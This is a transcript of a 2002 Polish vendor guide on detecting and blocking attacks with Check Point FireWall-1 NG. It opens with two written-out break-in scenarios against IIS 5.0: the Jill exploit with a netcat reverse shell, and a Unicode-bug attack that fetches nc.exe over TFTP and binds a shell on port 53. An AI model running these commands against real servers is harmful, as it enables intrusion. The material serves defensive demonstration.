PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

Save this PDF as:
 WORD  PNG  TXT  JPG

Wielkość: px
Rozpocząć pokaz od strony:

Download "PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA"

Transkrypt

1 PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Wykrrywani ie,, analiza i prrzeci iwdziałanie attakom hackerrów w Check Pointt FirreWal ll--1 Nextt Generratti ion ((NG)) Opracował: Mariusz Stawowski CCSA/CCSE (4.x, NG) Podstawą bezpieczeństwa systemu informatycznego jest dobrze opracowany projekt zabezpieczeń, wdrożony przez specjalistów z użyciem właściwie dobranych technologii renomowanych producentów, zarządzany przez wykwalifikowaną kadrę informatyczną. Samo zastosowanie nawet bardzo kosztownych produktów zabezpieczeń niczego w tym zakresie nie gwarantuje. Projekt systemu zabezpieczeń powstaje w oparciu o ogólną teorię zabezpieczeń (m.in. podstawowe zasady polityki bezpieczeństwa), wyniki przeprowadzonej analizy ryzyka i specyfikacji wymagań bezpieczeństwa, wymagania specyficzne dla ochranianego systemu, a także wymagania funkcjonalno-techniczne uzgodnione z właścicielem tego systemu (zwykle zleceniodawcą projektu). Projektując zabezpieczenia systemu informatycznego należy rozumieć, jakie istnieją rzeczywiste zagrożenia w tym systemie oraz w jaki sposób mogą one wystąpić. Projektant zabezpieczeń powinien postawić się w roli hakera i przeanalizować potencjalne możliwości wykonania ataku. Do tego celu wymagana jest znajomość technik włamań i innych rodzajów ataków. Za najgroźniejsze zagrożenie uznaje się obecnie włamanie. Daje ono, bowiem hakerowi bardzo szerokie możliwości działania (m.in. ujawnienie, modyfikacja lub zniszczenie danych, zablokowanie usług, instalacja ukrytego wejścia do systemu, przygotowanie środowiska do kontynuowania ataków na inne systemy). Dokument przedstawia praktyczne możliwości wykorzystania systemu zabezpieczeń Check Point FireWall-1 NG w zakresie wykrywania, analizy i przeciwdziałania atakom hakerów. Występują trzy podstawowe techniki włamań do systemów komputerowych, które należy uwzględnić w projekcie i wdrożeniu zabezpieczeń: exploit wykorzystanie istniejącego błędu systemu operacyjnego lub oprogramowania (np. serwera Web, serwera poczty) w celu przejęcia kontroli nad systemem, worm, trojan przesłanie do sieci wewnętrznej odpowiednio przygotowanego programu (np. pocztą elektroniczną), który po uruchomieniu skopiuje i wyśle na zewnątrz dane lub otworzy/umożliwi połączenie do sieci zewnętrznej, maskarada dostęp do zasobów systemu informatycznego poprzez podszycie się pod legalnego użytkownika (np. z użyciem odgadniętego hasła aplikacji, RAS lub VPN). Przed przystąpieniem do omawiania technologii Check Point FireWall-1 NG zostaną przedstawione rzeczywiste scenariusze włamań do systemów komputerowych. Scenariusze te zostały opracowane na podstawie prawdziwych włamań wykonanych przez CLICO w ramach realizowanych audytów bezpieczeństwa. Zastosowane narzędzia są ogólnie dostępne w Internecie. Ważne jest, aby analizując scenariusze włamań zwrócić uwagę i zrozumieć, jakie konsekwencje może mieć jeden błąd bezpieczeństwa serwera sieciowego. Dobrze opracowana konfiguracja zabezpieczeń systemu informatycznego powinna uwzględniać takie sytuacje i być na nie przygotowana. CLICO Sp. z o.o., Al. 3-go Maja 7, Kraków; Tel: ; ; Fax: ;

2 Scenariusz 1. Włamanie do serwera WWW (MS IIS 5.0) z wykorzystaniem błędu Remote Printer Overflow 2/ Uruchomienie Exploit (Jill) na serwer WWW (80/TCP) IIS 5.0 (Windows 2000) 3/ Połączenie zwrotne na port 53/TCP (konsola administratora Windows 2000) FIREWALL 1/ Uruchomienie NetCat w trybie nasłuchu na porcie 53/TCP Stacja audytora (Linux) 1. Na stacji audytora otwieramy konsolę CMD i uruchamiamy aplikację NetCat (nc.exe) w trybie nasłuchu na porcie 53/tcp (typowy port serwera dns): nc -s l -p 53 gdzie to adres IP stacji audytora 2. Na drugiej konsoli CMD uruchamiamy program exploit (jill-win32.exe): jill-win gdzie to atakowany serwer WWW (MS IIS 5.0) Poprawne wykonanie ataku sygnalizowane jest przez komunikat: iis5 remote.printer overflow. dark spyrit / beavuh labs. Connected. sent... you may need to send a carriage on your listener if the shell doesn't appear. have fun! 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 2

3 3. Po upływie kilku-dziecięciu sekund na stacji audytora otrzymujemy konsolę serwera WWW CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 3

4 Scenariusz 2. Włamanie do serwera WWW (MS IIS 5.0) z wykorzystaniem błędu UNICODE BUG 1. Kontrola podatności serwera na atak: Inne możliwe testy: e?/c+dir 2. Penetracja systemu, np CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 4

5 3. Przejecie kontroli nad systemem Kopiujemy cmd.exe do katalogu Scripts serwera WWW pod nazwą run.exe. nnt\system32\cmd.exe+run.exe 3.2. Zapisujemy na serwerze plik unicode.bat o zawartości: tftp -i Y.Y.Y.Y GET nc.exe get.exe gdzie Y.Y.Y.Y to adres IP serwera TFTP, na którym umieszczono aplikację NetCat Dokonujemy tego wpisując adres URL: -i GET nc.exe get.exe>unicode.bat 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 5

6 3.3. Na lokalnym serwerze (IP: ) uruchamiamy serwer TFTP i umieszczamy w jego katalogu program NetCat (nc.exe) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 6

7 3.4. Z lokalnego serwera TFTP kopiujemy plik nc.exe do katalogu Scripts na serwerze WWW i zapisujemy go pod nazwą get.exe. Dokonujemy tego przy użyciu przeglądarki WWW, uruchamiając skrypt unicode.bat. Wpisujemy adres URL: CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 7

8 3.5. Tworzymy skrypt otwierający NetCat na wybranym porcie (np. 53/tcp) i uruchamiamy. Dokonujemy tego przy użyciu przeglądarki WWW, wpisując adres URL: -l -p 53 -t -e run.exe>unicode2.bat CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 8

9 6. Przy użyciu klienta Telnet logujemy się na porcie 53tcp i uzyskujemy konsolę systemu Windows NT: telnet CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 9

10 Opracowanie projektu zabezpieczeń Analizując przedstawione scenariusze włamań i łatwość ich wykonania można w pierwszej chwili dojść do wniosku, że nigdy nie uda się skutecznie ochronić zasobów systemu informatycznego. Nie jest to prawda. Dobrze opracowane, skonfigurowane i zarządzane zabezpieczenia stanowią skuteczną ochronę przed atakami hakerów i innymi zagrożeniami. Ważne jest, aby bezpieczeństwo systemu utrzymywane było przez wszystkie warstwy ochrony tzn. zabezpieczenia sieciowe, zabezpieczenia systemu operacyjnego, zabezpieczenia aplikacji i baz danych. Warstwy zabezpieczeń powinny przy tym uzupełniać i ubezpieczać się wzajemnie. W zakresie ochrony przed atakami hakerów istotną rolę dla bezpieczeństwa systemu informatycznego odgrywa technologia zabezpieczeń sieciowych, która stanowi pierwszą warstwę ochrony. Względem tych zabezpieczeń stawiane są następujące podstawowe wymagania: kompletny zakres ochrony (m.in. Firewall, IDS 1, Content Control 2 ), skuteczność i wydajność (m.in. Firewall skutecznie kontroluje ruch w sieci i nie powoduje przy tym zakłóceń funkcjonowania aplikacji, IDS w czasie wzrostu obciążenia w sieci nie gubi ramek i wykrywa ataki), zarządzanie bezpieczeństwa (m.in. analiza, monitorowanie, alarmowanie, raporty). Typowy schemat zabezpieczeń systemu dostępu do Internetu opartych o technologię Check Point FireWall-1 został przedstawiony na poniższym rysunku. Strefa DMZ Internet FireWall-1 NG Sieć prywatna System wykrywania intruzów (np. Intrusion SecureNet) ALARM!!! ALARM!!! Konsola FireWall-1 NG W zakresie przeciwdziałania atakom hakerów szczególną uwagę należy zwrócić na następujące aspekty bezpieczeństwa: szczelna polityka bezpieczeństwa (np. serwer w strefie DMZ posiada dostęp do innych stref bezpieczeństwa tylko dla protokołów, które są wymagane do jego poprawnego funkcjonowania), kontrola protokołów dostępu do newralgicznych usług systemu informatycznego realizowana na poziomie aplikacji (m.in. kontrola poprawności poleceń protokołów i formatu danych), monitorowanie systemu i alarmowanie odbywa się z użyciem dobrej klasy zabezpieczeń Firewall i IDS (np. Intrusion SecureNet). 1 Intrusion Detection System system wykrywania intruzów (wykrywanie prób penetracji, włamań i innych rodzajów ataków m.in. D/DoS) 2 system kontroli zawartości (wykrywanie wirusów, robaków, koni trojańskich i innych groźnych aplikacji) 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 10

11 Konfiguracja Check Point FireWall-1 NG Kontrola IP Spoofing, SYN Flood i MAD Wykrywanie i blokowanie ataków opartych na IP Spoofing 3 bezpośrednio na interfejsach sieciowych Firewall Gateway. jest realizowane Konfiguracja kontroli IP Spoofing dla interfejsu sieciowego Firewall zależy od jego usytuowania w strukturze sieci. Dla poszczególnych interfejsów Firewall Gateway należy ustalić w zakładce Topology, jakie źródłowe adresy IP są na nich dozwolone (patrz rysunek): 1. External interfejs zewnętrzny (dozwolone są wszystkie adresy IP poza adresami, które należą do sieci wewnętrznych), 2. Internal interfejs wewnętrzny (dozwolone są wyłącznie adresy IP z sieci wewnętrznych, bądź innych wyznaczonych jako Specific ), 3. Anti-Spoofing rejestrowanie zdarzeń (logowanie) i alarmowanie. 3 IP Spoofing polega na wysyłaniu pakietów ze sfałszowanym adresem źródłowym tak, aby ich odbiorca sądził, że pochodzą od innego, z reguły bardziej uprzywilejowanego nadawcy. Ochrona przez atakami wykorzystującymi technikę IP Spoofing na FireWall-1 jest skuteczna na tyle, na ile umożliwia to IPv4 (tzn. wykrywanie niedozwolonych adresów źródłowych pomiędzy interfejsami Firewall). Dopiero IPv6 przewiduje zastosowanie w tym zakresie wiarygodnych zabezpieczeń. Na FireWall-1 można dodatkowo zastosować techniki VPN oraz uwierzytelnianie użytkowników usług CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 11

12 Konfiguracja mechanizmu wykrywania i przeciwdziałania atakom typu SYN Flood 4 odbywa się w zakładce SYNDefender w definicji obiektu FireWall-1 Gateway. FireWall-1 udostępnia dwie techniki blokowania tego ataku: SYN relay System zaporowy odbiera nadchodzące pakiety SYN i w imieniu serwera TCP potwierdza nawiązanie komunikacji sieciowej z klientem TCP. Po potwierdzeniu przez klienta sesji TCP, FireWall-1 przekazuje nawiązaną już sesję do serwera. Passive SYN Gateway FireWall-1 biernie obserwuje przebieg nawiązywania komunikacji TCP. W razie, gdy potwierdzenie lub odrzucenie komunikacji nie nadchodzi po relatywnie krótkim czasie (domyślnie 10 sekund), system zaporowy sam informuje serwer TCP o odrzuceniu komunikacji. 4 SYN Flood polega na zalewaniu określonego portu TCP dużą liczbą pakietów SYN, w których adres źródłowy został sfałszowany (ang. spoofing) na adres IP komputera, który w rzeczywistości nie istnieje. W konsekwencji bufor serwera działającego na tym numerze portu zastaje przepełniony i serwer nie jest w stanie obsługiwać żadnych klientów, ponieważ oczekuje na potwierdzenie lub odrzucenie komunikacji TCP zainicjowanej przesłaniem pakietów SYN CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 12

13 Moduł MAD (Malicious Activity Detection) odpowiada za wykrywanie podstawowych technik wykorzystywanych przez hakerów w trakcie prowadzenia penetracji, włamań i ataków destrukcyjnych (D)DoS. Jest zintegrowany z modułem FireWall-1/VPN-1. MAD został opracowany przez Check Point w ramach projektu Cyber Attack Defence System (CADS). Nie powinien być jednak traktowany jako dedykowany system wykrywania intruzów (tzn. nie jest środkiem zastępczym dla Intrusion SecureNet). Moduł MAD posiada umiejętności wykrywania następujących technik: SYN Flood, IP Spoofing, Port Scanning, Blocked Connection Port Scanning, Successive Multiple Connections, Login Failure, Successive Alerts, Land Attack. Konfiguracja MAD jest zapisana w pliku cpmad_config.conf na stacji zarządzającej. Moduł MAD jest domyślnie uaktywniony za pomocą parametru: MAD_system_mode = on. Ustawienia domyślne konfiguracji MAD mogą zostać dostosowane do specyfiki chronionego systemu (np. w systemach o wysokim stopniu zagrożenia mogą zostać zaostrzone). Dla przykładu, wykrywanie skanowania portów #port_scanning można ustawić tak, aby generowanie alarmu następowało w sytuacji, gdy ten sam komputer w czasie 60 sekund wykona 5 prób dostępu do różnych portów serwera: MAD_port_scanning_mode = on MAD_port_scanning_time_interval = 60 MAD_port_scanning_repetitions = 5 MAD_port_scanning_action = alert 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 13

14 Praktyczny test MAD Uruchomienie SuperScan (skanowanie portów TCP) Reakcja zabezpieczeń 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 14

15 Ochrona poczty Poczta elektroniczna jest w większości instytucji powszechnie wykorzystywaną usługą Internetu, szczególnie w zakresie wymiany informacji z klientami i partnerami handlowymi. Usługa ta stwarza jednak wiele problemów w zakresie bezpieczeństwa, m.in.: serwer poczty może zostać zaatakowany przez hakera, a następnie posłużyć do włamania do sieci prywatnej, serwer poczty może zostać zablokowany za pomocą ataku Denial of Service (DoS), bądź ulec awarii, wiele groźnych aplikacji (np. wirusy, robaki, konie trojańskie) może przedostać się do sieci prywatnej poprzez wiadomości pocztowe, serwer poczty może odebrać wiele niepożądanych przesyłek pocztowych tzw. spamów, serwer poczty może zostać wykorzystany przez hakerów (nazywanych także lamerami) do wysyłania spamów do innych serwerów w Internecie, poufne informacje przesyłane za pomocą poczty mogą zostać odczytane przez osoby nieupoważnione, bądź zmodyfikowane w niepożądany sposób, serwer DNS udostępniający informacje nt. serwera poczty może zostać zablokowany lub ulec awarii CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 15

16 - alarmowanie 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 16

17 - restrykcje względem wiadomości CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 17

18 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 18

19 - ukrywanie informacji nt. sieci wewnętrznej 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 19

20 - blokowanie Mail Relaying 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 20

21 - kontrola zawartości wiadomości pocztowych i załączników na dedykowanym serwerze CVP (np. esafe Gateway, Trend Micro VirusWall) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 21

22 Praktyczny test Reakcja zabezpieczeń 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 22

23 - dostrajanie SMTP Security Server 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 23

24 Kontrola TCP, UDP, ICMP Praktyczny test 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 24

25 Reakcja zabezpieczeń 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 25

26 Kontrola DNS Włączenie kontroli poprawności protokołu DNS: :fw_dns_verification (true) Procedura zmiany parametru FireWall-1 odbywa się w następującej kolejności: 1. Zamykamy konsole GUI. 2. Dokonujemy modyfikacji parametru za pomocą dbedit: F:\>dbedit Enter Server name (ENTER for 'localhost'): Enter User Name: Enter User Password: Please enter a command, -h for help or -q to quit: dbedit> modify properties firewall_properties fw_dns_verification true dbedit> update properties firewall_properties firewall_properties updated successfully. dbedit>quit 3. Otwieramy konsole GUI (Policy Editor), kontrolujemy ustawienie typu protokółu domain_tcp jako DNS_TCP i instalujemy politykę bezpieczeństwa 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 26

27 Praktyczny test Otwarcie połączenia zwrotnego NetCat port 53/tcp (w trakcie ataku przedstawionego wcześniej w scenariuszu 1). Reakcja zabezpieczeń 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 27

28 Kontrola HTTP - włączenie szczegółowej kontroli protokołu HTTP Praktyczny test Wykonanie ataku Jill przedstawionego wcześniej w scenariuszu 1. Reakcja zabezpieczeń 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 28

29 - inspekcja URL (np. blokowanie odwołań do plików systemowych) 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 29

30 - przekierowanie na inną stronę URL Praktyczny test Wykonanie ataku UNICODE przedstawionego wcześniej w scenariuszu 2. Reakcja zabezpieczeń 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 30

31 - dostrajanie HTTP Security Server Analiza logów FireWall-1 Zapis realizacji ataku (scenariusz 2) 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 31

32 Kontrola FTP - izolowanie serwera FTP 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 32

33 Praktyczny test Próba zapisania pliku na serwerze FTP. Reakcja zabezpieczeń - dostrajanie FTP Security Sever 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 33

34 SmartDefence - moduł SmartDefence zarządzany z centralnej konsoli GUI - aktualizacja bazy ataków SmartDefence 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 34

35 - kontrola i blokowanie niepoprawnych pakietów IP i ICMP - ochrona serwerów FTP 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 35

36 - ochrona serwerów HTTP 2002 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 36

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Przewodnik instalacji i konfiguracji SofaWare S-box SofaWare S-box to niewielkiego rozmiaru, ciche w działaniu, łatwe w instalacji i zarządzaniu urządzenia Firewall

Bardziej szczegółowo

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Podstawowe zasady realizacji testów penetracyjnych systemu informatycznego Opracował: Mariusz Stawowski Utrzymywanie wysokiego poziomu bezpieczeństwa systemu informatycznego

Bardziej szczegółowo

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik instalacji i konfiguracji systemu zabezpieczeń Check Point VPN-1/FireWall-1 SmallOffice NG SmallOffice jest uproszczoną w zakresie zarządzania wersją systemu

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Przewodnik konfiguracji i zarządzania Siemens 4YourSafety Konfiguracja Siemens 4YourSafety w zakresie systemu operacyjnego i supportu urządzenia może odbywać się w

Bardziej szczegółowo

Przewodnik technologii ActivCard

Przewodnik technologii ActivCard PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik technologii ActivCard Część II. Polityka bezpieczeństwa systemu ActivPack CLICO Centrum Oprogramowania Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków; Tel: 12

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Konfiguracja VPN typu Site-Site pomiędzy SofaWare S-box i systemem Check Point VPN-1 Gateway NG SofaWare S-box to urządzenia Firewall i VPN dostarczane przez Check

Bardziej szczegółowo

Robaki sieciowe. + systemy IDS/IPS

Robaki sieciowe. + systemy IDS/IPS Robaki sieciowe + systemy IDS/IPS Robak komputerowy (ang. computer worm) samoreplikujący się program komputerowy, podobny do wirusa komputerowego, ale w przeciwieństwie do niego nie potrzebujący nosiciela

Bardziej szczegółowo

Funkcjonalność ochrony antywirusowej w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń AV

Funkcjonalność ochrony antywirusowej w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń AV Funkcjonalność ochrony antywirusowej w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń AV Produkty zabezpieczeń typu UTM (ang. unified threat management) to urządzenia, w których zawarte

Bardziej szczegółowo

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Praktyczne metody ochrony poczty elektronicznej Opracował: Mariusz Stawowski Poczta elektroniczna jest w większości instytucji powszechnie wykorzystywaną usługą Internetu,

Bardziej szczegółowo

Polityka bezpieczeństwa i zarządzanie systemem wykrywania intruzów IDP i aktywnej ochrony przed atakami

Polityka bezpieczeństwa i zarządzanie systemem wykrywania intruzów IDP i aktywnej ochrony przed atakami Polityka bezpieczeństwa i zarządzanie systemem wykrywania intruzów IDP i aktywnej ochrony przed atakami Współczesnym systemom IDS zarzucane jest, że baza sygnatur ataków analizowana jest przez nie w sposób

Bardziej szczegółowo

Metody ataków sieciowych

Metody ataków sieciowych Metody ataków sieciowych Podstawowy podział ataków sieciowych: Ataki pasywne Ataki aktywne Ataki pasywne (passive attacks) Polegają na śledzeniu oraz podsłuchiwaniu w celu pozyskiwania informacji lub dokonania

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

Podstawy bezpieczeństwa

Podstawy bezpieczeństwa Podstawy bezpieczeństwa sieciowego Dariusz CHAŁADYNIAK 2 Plan prezentacji Złośliwe oprogramowanie Wybrane ataki na sieci teleinformatyczne Wybrane metody bezpieczeństwa sieciowego Systemy wykrywania intruzów

Bardziej szczegółowo

Przewodnik technologii ActivCard

Przewodnik technologii ActivCard PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik technologii ActivCard Część VIII. Wykorzystanie kart Smart Card w systemie identyfikacji cyfrowej ActivPack CLICO Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków;

Bardziej szczegółowo

BEZPIECZEŃSTWO W SIECIACH

BEZPIECZEŃSTWO W SIECIACH PREZENTACJA NA SYSTEMY OPERACYJNE Katarzyna Macioszek styczeń 2007 DEFINICJA ROBAKA CO TO JEST ROBAK? PRZYKŁADY ROBAKÓW Robak - program komputerowy zdolny do samoreplikacji przez sieć bez interakcji użytkownika

Bardziej szczegółowo

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci N, Wykład 6: Bezpieczeństwo w sieci 1 Ochrona danych Ochrona danych w sieci musi zapewniać: Poufność nieupoważnione osoby nie mają dostępu do danych Uwierzytelnianie gwarancja pochodzenia Nienaruszalność

Bardziej szczegółowo

Własności: Wykrywa ataki analizując całość ruchu sieciowego. Nie dopuszcza, żeby intruz dosięgnął chronionych zasobów

Własności: Wykrywa ataki analizując całość ruchu sieciowego. Nie dopuszcza, żeby intruz dosięgnął chronionych zasobów System wykrywania intruzów i aktywnej ochrony Wykrywa ataki analizując całość ruchu sieciowego Nie dopuszcza, żeby intruz dosięgnął chronionych zasobów to system zabezpieczeń sieciowych realizujący zadania

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

Strategie i techniki ochrony systemów informatycznych

Strategie i techniki ochrony systemów informatycznych Strategie i techniki ochrony systemów informatycznych Systemy informatyczne są niezbędne do prawidłowego funkcjonowania większości firm i instytucji. Często zależy od nich realizacja zadań biznesowych.

Bardziej szczegółowo

Projektowanie bezpieczeństwa sieci i serwerów

Projektowanie bezpieczeństwa sieci i serwerów Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Procedura konfiguracji SofaWare S-box w zakresie zestawienia łącza Neostrada Plus i zabezpieczenia komputera użytkownika Neostrada Plus to usługa stałego dostępu do

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Instalacja i konfiguracja ActivCard Gold i Entrust/PKI w środowisku Microsoft Active Directory Przygotował: Mariusz Stawowski Entrust Certified Consultant CLICO Sp.

Bardziej szczegółowo

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego ZADANIE V OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego A. ROZMIARY I CHARAKTER ZADANIA 1. W ramach dostawy oprogramowania antywirusowego Szpital

Bardziej szczegółowo

Pomoc dla http://host.nask.pl/ 31.12.2012 r.

Pomoc dla http://host.nask.pl/ 31.12.2012 r. Pomoc dla http://host.nask.pl/ 31.12.2012 r. Spis treści Kontakt... 2 Logowanie do konta pocztowego przez WWW... 3 Logowanie do panelu administracyjnego... 4 Konfiguracja klienta pocztowego... 7 Umieszczanie

Bardziej szczegółowo

INSTRUKCJA OBSŁUGI DLA SIECI

INSTRUKCJA OBSŁUGI DLA SIECI INSTRUKCJA OBSŁUGI DLA SIECI Zapisywanie dziennika druku w lokalizacji sieciowej Wersja 0 POL Definicje dotyczące oznaczeń w tekście W tym Podręczniku użytkownika zastosowano następujące ikony: Uwagi informują

Bardziej szczegółowo

Zagrożenia związane z udostępnianiem aplikacji w sieci Internet

Zagrożenia związane z udostępnianiem aplikacji w sieci Internet Zagrożenia związane z udostępnianiem aplikacji w sieci Internet I Ogólnopolska Konferencja Informatyki Śledczej Katowice, 8-9 stycznia 2009 Michał Kurek, Aleksander Ludynia Cel prezentacji Wskazanie skali

Bardziej szczegółowo

Funkcjonalność ochrony firewall w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń

Funkcjonalność ochrony firewall w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń Funkcjonalność ochrony firewall w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń Produkty zabezpieczeń typu UTM (ang. unified threat management) to urządzenia, w których zawarte zostało

Bardziej szczegółowo

Produkty. MKS Produkty

Produkty. MKS Produkty Produkty MKS Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE MKS Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych

Bardziej szczegółowo

Zdalne logowanie do serwerów

Zdalne logowanie do serwerów Zdalne logowanie Zdalne logowanie do serwerów Zdalne logowanie do serwerów - cd Logowanie do serwera inne podejście Sesje w sieci informatycznej Sesje w sieci informatycznej - cd Sesje w sieci informatycznej

Bardziej szczegółowo

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7 I Wprowadzenie (wersja 0906) Kurs OPC S7 Spis treści Dzień 1 I-3 O czym będziemy mówić? I-4 Typowe sytuacje I-5 Klasyczne podejście do komunikacji z urządzeniami automatyki I-6 Cechy podejścia dedykowanego

Bardziej szczegółowo

9. System wykrywania i blokowania włamań ASQ (IPS)

9. System wykrywania i blokowania włamań ASQ (IPS) 9. System wykrywania i blokowania włamań ASQ (IPS) System Intrusion Prevention w urządzeniach NETASQ wykorzystuje unikalną, stworzoną w laboratoriach firmy NETASQ technologię wykrywania i blokowania ataków

Bardziej szczegółowo

ZALECENIA DLA MIGRACJI NS-BSD V8 => V9

ZALECENIA DLA MIGRACJI NS-BSD V8 => V9 ZALECENIA DLA MIGRACJI NS-BSD V8 => V9 Wprowadzenie Wersja 9 NS-BSD wprowadza wiele zmian. Zmieniła się koncepcja działania niektórych modułów NETASQ UTM. Sam proces aktualizacji nie jest więc całkowicie

Bardziej szczegółowo

iptables -F -t nat iptables -X -t nat iptables -F -t filter iptables -X -t filter echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -F -t nat iptables -X -t nat iptables -F -t filter iptables -X -t filter echo 1 > /proc/sys/net/ipv4/ip_forward Zarządzanie bezpieczeństwem w sieciach Router programowy z firewallem oparty o iptables Celem ćwiczenia jest stworzenie kompletnego routera (bramki internetowej), opartej na iptables. Bramka umożliwiać

Bardziej szczegółowo

